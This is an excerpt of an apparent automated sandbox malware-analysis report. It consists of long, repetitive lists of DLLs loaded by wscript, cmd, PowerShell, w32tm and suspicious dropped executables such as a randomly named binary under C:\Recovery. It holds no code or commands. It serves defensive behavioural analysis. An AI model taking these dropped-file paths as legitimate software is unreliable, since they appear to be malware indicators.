                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: version.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: version.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\uAsLgsGzSk.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
